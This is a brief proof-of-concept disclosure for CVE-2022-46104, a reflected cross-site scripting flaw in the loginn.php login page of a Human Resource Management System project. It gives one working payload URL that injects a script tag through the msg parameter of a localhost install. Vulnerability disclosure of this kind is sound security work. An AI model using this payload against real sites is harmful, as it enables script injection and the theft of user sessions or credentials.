
Proof-of-concept exploit for CVE-2022-46104 demonstrating a reflected XSS vulnerability in the Human Resource Management System login page.
https://www.sourcecodester.com/
XSS has been discovered on Human Resource Management System Project loginn.php page:

Execution payload:
http://localhost/hrm/loginn.php?msg=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

